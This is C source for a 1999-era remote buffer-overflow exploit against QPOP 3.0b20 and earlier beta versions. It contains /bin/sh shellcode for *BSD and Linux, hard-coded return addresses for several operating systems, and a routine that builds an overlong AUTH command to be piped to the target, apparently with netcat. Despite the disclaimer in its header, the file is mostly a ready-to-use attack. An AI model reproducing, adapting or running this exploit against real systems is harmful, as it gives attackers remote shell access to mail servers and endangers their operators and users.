/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
 * combination *BSD and Linux
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 *
 * I have written this to test and demonstrate vulnerabilities on clients' 
 * systems only.  
 *
 * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
 * (at least not until Qualcomm issues a patch)
 * 
 * You may only use this to test your own system(s).
 * I am not responsible for any unauthorized use of this program.
 *
 * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux 
 * 
 * Since popper is usually compiled by the admin, return addresses will vary,
 * but I have included common values.  You may have to provide an offset
 * to get it to work on your system.
 * 
 * I wrote the exploit near the beginning of November 1999, and unlike some 
 * other exploits I've seen since, this one works even on Linux boxes on which 
 * inetd was not started from a shell prompt.
 *
 * Usage: If you can't figure out how to use this, you shouldn't
 * 	  be in the security business.  (try netcat)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

unsigned int NOP=0x90;

unsigned long offset=0; /* default offset */

char bsdsc[]=
  "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
  "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
  "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
  "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
  "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
  "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

char linuxsc[]=
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
  "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
  "\xff\xff/bin/sh";

struct version
  {
    int num;
    char* systype;
    int buffer_length;
    long address;
  };

struct version verlist[] =
    {
      {
        0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c
      },
      {1, "BSDI 4.x", 1001, 0x8047564},
      {2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
      {3, "Linux", 990, 0xbfffd304},
      {0, 0, 0, 0}
    };

int main(int argc, char** argv)
{
  char* buffer, *shellcode;
  int buflen, i=0, ver, retaddr, align=0;
  struct sockaddr_in sockaddr;
  struct hostent* host;

  if (argc < 2)
    {
      printf("Usage: %s version [offset]\n", argv[0]);
      i=-1;
      printf("\nAvailable versions:\n");
      while (verlist[++i].systype)
        {
          printf("   %d: %s\n", verlist[i].num, verlist[i].systype);
        }
      printf("\n");
      exit(-1);
    }

  ver=atoi(argv[1]);
  if (argc > 2)
    {
      offset=atoi(argv[2]);
    }
  if (strstr(verlist[ver].systype, "Linux"))
    {
      shellcode=linuxsc;
      align=2;
    }
  else shellcode=bsdsc;

  buflen=verlist[ver].buffer_length;
  retaddr=verlist[ver].address;

  buffer=(char*)malloc(buflen);
  memset(buffer, NOP, buflen);
  memcpy(buffer, "AUTH ", 5);
  memcpy(buffer+800, shellcode, strlen(shellcode));
  for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4)
    {
      *((unsigned long int *)&buffer[i])=retaddr+offset;
    }
  buffer[buflen-2]='\n';
  buffer[buflen-1]='\n';

  printf("%s\n", buffer);
}
/*                    www.hack.co.za              [2000]*/